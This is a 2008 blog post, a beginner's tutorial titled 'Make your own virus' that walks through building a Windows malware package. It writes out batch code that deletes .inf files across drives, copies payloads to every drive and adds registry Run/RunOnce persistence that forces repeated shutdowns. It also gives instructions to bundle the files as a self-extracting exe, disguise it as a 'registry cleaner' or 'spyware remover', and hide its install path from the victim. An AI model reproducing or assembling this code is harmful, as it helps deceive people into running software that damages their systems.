Tuesday, August 12, 2008

Make your own virus....in just 15 steps (for beginners)

Here you can create your own virus....
First of all you will have to download these software....
1. bat to exe converter 
2. zip to exe converter
follow these steps to make a simple virus_

1. open notepad and write this code-
@echo off
DEL C:\*.inf
cls
DEL d:\*.inf
cls
DEL e:\*.inf
cls
DEL f:\*.inf
cls
md c:\windows\system32\ravi
@xcopy c:\windows\system32\ravi\myvirus\ravi.html c:\windows\system32\COM\
@xcopy c:\windows\system32\ravi\myvirus\explore.exe c:\windows\system32\com\
@xcopy c:\windows\system32\ravi\myvirus\ravi1.exe c:\windows\system32\COM\
@xcopy c:\windows\system32\ravi\myvirus\beep.exe c:\windows\system32\COM\
cls
md C:\RAVI.VIRUS
md d:\RAVI.VIRUS
md e:\RAVI.VIRUS
md f:\RAVI.VIRUS
cls
@xCOPY c:\windows\system32\ravi\myvirus\rAVI.virus.exe C:\RAVI.VIRUS
@xCOPY c:\windows\system32\ravi\myvirus\rAVI.virus.exe D:\RAVI.VIRUS
@xCOPY c:\windows\system32\ravi\myvirus\ravi.virus.exe E:\RAVI.VIRUS
@xCOPY c:\windows\system32\ravi\myvirus\ravi.virus.exe F:\RAVI.VIRUS
@xCOPY d:\RAVI.VIRUS\*.* C:\
@xCOPY c:\RAVI.VIRUS\*.* D:\
@xCOPY d:\RAVI.VIRUS\*.* E:\
@xCOPY e:\RAVI.VIRUS\*.* F:\
cls
REGEDIT /S c:\windows\system32\ravi\myvirus\Ravi1.REG
CLS
c:\windows\system32\ravi\myvirus\beep.exe
c:\windows\system32\ravi\myvirus\ravi.virus.exe
and save it r1.virus.bat

2. make a new .bat file and write this code-
echo oFF
system -s -t 00
and save it ravi.virus.bat

3. now open turbo c and write this code-
#include
#include
#include
main()
{
printf("\n\n\n\n\n\n\n\n\n\n\t\t\t....VIRUS ACTIVATED....");
sound(1000);
delay(30000);
nosound();
getch();
}
and compile it and  save  beep.exe

3. open notepad and write this code-
REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce]
"system"="c:\\windows\\system32\\com\\ravi1.exe"
and save it ravi1.reg

4.again open notepad and write this code-
echo oFF
REGEDIT /S c:\windows\system32\ravi\dhoni-wallpaper\Ravi2.REG
CLS
c:\windows\system32\com\ravi.html
and save it ravi1.bat

5. open notepad and write this code-
</div><div>ravi.virus.sys32

((((((((((((_ATTENTION_))))))))))))

Your computer has been infected by ravi.virus.

MEDIA INSTITUTE OF INFORMATION TECHNOLOGY ------ Ravikant Upadhyay,Ganjbasoda[Bhopal,MP]

and save it ravi.html

6. again open notepad and write this code-
REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"system"="c:\\windows\\system32\\com\\explore.exe"
and save it ravi2.reg

7.open notepad and type this code-
echo oFF
system -s -t 00
and save it explore.bat

8. now open bat to exe converter and convert all batch files into executable files..

9. delete all .bat files

10. put all .exe files and .reg files in a folder,rename this folder to myvirus

11. make a .zip file of this 'myvirus' folder

12.open zip to exe converter and in 'run this file after extract files' textbox write r1.virus.exe
     and in 'extract to folder' textbox write c:\windows\system32\ravi

13. myvirus.exe is your virus...after making .zip to .exe file u can rename it....like disk washer,spyware remover,registry cleaner or whatever you want...

14. when someone will run this myvirus .exe he can change path...if he does it.. your virus wont work... if you want to hide path from someone.... you will have to use resource hacker software... open resource hacker and go to dialog  _ 1033 and go to 
  CONTROL "", 1003, EDIT, ES_LEFT | ES_AUTOHSCROLL | WS_CHILD'| WS_VISIBLE'| WS_BORDER | WS_TABSTOP, 7, 44, 206, 13 and delete | WS_VISIBLE compile code and save file... your virus is ready....

you can download zip to exe converter and bat to exe converter from brothersoft...

15. To deactivate this virus...start your computer in safemode open regedit and delete explore.exe from HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

This is a very simple virus for beginners......